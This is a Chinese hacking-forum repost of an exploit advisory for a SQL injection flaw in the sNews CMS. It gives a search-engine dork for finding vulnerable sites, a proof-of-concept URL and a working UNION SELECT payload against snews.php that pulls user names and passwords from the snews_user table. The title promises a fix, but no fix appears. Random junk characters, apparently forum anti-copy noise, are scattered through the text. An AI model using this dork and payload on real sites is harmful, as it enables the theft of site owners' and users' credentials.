找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2058|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability1 Y9 s8 {. Z/ ]" Y8 F
作者: By onestree
; w+ r& U! f) X  R- l/ ]下载地址 : http://snewscms.com/
* T+ l( k. F" n$ o+ V& w测试平台 : ubuntu 12.10 / win 79 l. k' D  q# j' ~
关键词: inurl:"tanyakan pada rumput yang bergoyang"  \  Y4 p- s) |& n- @

3 a, h& ]# Y  ]6 A: c. Z1 ?
3 |) R2 u; Q) B: {9 x*************************************************************- X' p6 q7 ]  V4 E; q7 O4 B

6 G6 V+ \$ F5 P+ \+ _& H3 a: i' kSQL poc:
. t( ]; J! |+ T
$ H( l9 a8 J7 c. [. r5 Ghttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
4 p4 t8 A/ l$ p4 h
3 {7 i8 \, \- Y0 w示例
! u( ?$ b; ?+ N, J4 d! A) q # h0 u: I0 `4 M
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/** j( f: o' O3 ^3 S; U& \* f. D
: i- [/ }# d: R" `
* l5 w! h' W* {
致谢:. S; e$ x9 h% \  S$ q

% j* s% E: x( d7 k  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell/ Q& h$ a: v4 ^0 }- J- X8 e
     % Q  L7 Q2 X+ v/ k* ^8 u
          indonesiancoder - moeslimh4x0r - go-coder
& @; d4 N1 j, C% [9 `
  K  I" Q0 f. ispesial my hunny :*
1 [  m) x/ i6 j7 c/ k0 ^0 K* l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表